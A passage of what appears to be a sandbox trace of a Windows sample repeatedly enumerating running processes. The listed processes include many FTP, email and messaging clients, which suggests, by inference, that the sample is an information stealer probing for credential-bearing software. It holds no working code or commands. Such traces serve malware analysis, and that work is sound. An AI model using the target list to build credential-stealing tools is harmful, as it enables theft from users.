th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0228.486] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0228.488] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0228.490] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0228.492] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0228.494] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0228.499] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0228.501] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0228.503] CloseHandle (hObject=0xdc4) returned 1 [0228.503] Sleep (dwMilliseconds=0x64) [0228.616] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdc4 [0228.629] Process32First (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0228.631] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0228.632] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0228.634] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0228.639] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0228.640] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0228.642] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0228.643] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0228.645] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0228.646] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.647] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.649] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0228.650] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.655] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.657] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.659] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.660] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.662] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.671] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.673] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0228.674] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0228.675] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0228.677] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.678] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0228.679] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0228.681] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0228.682] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0228.686] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0228.687] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.689] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0228.690] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0228.691] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0228.693] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0228.694] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0228.695] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0228.697] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0228.703] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0228.706] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0228.708] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0228.710] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0228.712] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0228.734] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0228.735] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0228.737] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0228.738] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0228.740] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0228.741] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0228.742] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0228.744] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0228.745] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0228.749] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0228.751] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0228.752] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0228.754] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0228.755] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0228.757] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0228.758] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0228.760] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0228.765] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0228.768] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0228.771] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0228.774] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0228.786] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0228.788] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0228.790] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0228.797] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0228.799] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0228.801] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0228.803] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0228.806] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0228.811] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0228.814] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0228.816] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0228.818] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0228.820] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0228.823] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, 